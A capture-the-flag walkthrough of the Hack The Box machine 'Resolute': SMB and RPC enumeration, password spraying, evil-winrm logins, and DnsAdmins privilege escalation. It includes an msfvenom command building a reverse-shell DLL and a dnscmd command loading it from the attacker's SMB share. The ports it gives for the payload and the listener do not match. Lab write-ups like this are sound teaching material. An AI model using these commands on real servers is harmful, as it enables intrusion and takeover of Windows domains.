In this article we are going to solve another boot2root challenge Resolute from hackthebox .
As usual we kick off with nmap using to find open ports and services running in the target system using the command
sudo nmap -sC -sV -o nmap.txt -Pn 10.10.10.169
so many ports are open , we start with SMB Enumeration and to find some open SMB Shares we used the command
it looks like anonymous login is successful but we have no SMB shares , we also tried some NULL Authentication but got nothing , next we tried another tool rpcclient as
rpcclient -U '' 10.10.10.169
and after searching on the internet we found some useful commands we can use and here we have used enumdomusers
we have a list of usernames and this can be useful in bruteforcing the password .
To gain some more information we decided to use another tool enum4linux
This looks quite similar to the above output we got from rpcclient but here we have some useful message , Account created. Password set to Welcome123!
Okay we have usernames and a password we decided to do bruteforce against SMB by using msfconsole
we have set all the required and necessary options and also I don't like my terminal to be filled with lots of data so verbose set to false , and we got a hit for user melanie as password Welcome123! , So till now we have found 0 SMB shares so there is no use of login into SMB .
Now we try to connect to the machine as user melanie by using evil-winrm
sudo evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Now we can read the user flag in Desktop directory :)
it's time for some enumeration and manual searching and after some time we found something interesting in C:\
dir command doesn't give us useful result so we run the command ls -hidden to check for hidden directories and found one as PSTranscripts , we change our directory to this PSTr....and there we found a another hidden directory and inside that hidden direcotry we have a .txt file lets try to read that file
okay we have username as ryan and password which is very long ( I didn't feel like typing it here ;)
again we used the evil-winrm tool to connect to the machine as user ryan
we run the command whoami /groups to check for all the groups and found this interesting group DnsAdmins and we searched online about this group and found that this can be used to get RCE , so what we are going to do is
Making a dll payload that sends a reverse shell back to our machine with msfvenom.
Serving it using SMB Server to make it available to the Windows machine.And, we will also setup a netcat listener to catch our reverse shell.
Importing that dll in the DNS Server.
Restarting the DNS Server so that it loads the dll file.
command used to prepare the payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.28 LPORT=777 --platform=windows -f dll > haclabs.dll
Now we need to server this payload and for that we used the SMBServer , script can be found in our kali-linux system
here rest is the name of our SMB Share.
Next we need to import the dll into dns server and for that we have used the command
dnscmd resolute /config /serverlevelplugindll \\10.10.15.28\rest\haclabs.dll
after that we have to restart the dns server so that dns server can load our dll payload/file
and we have setup a listener on port 7777 to catch our reverse shell
we are admin user now and can read the final flag , hope you like the walkthrough :)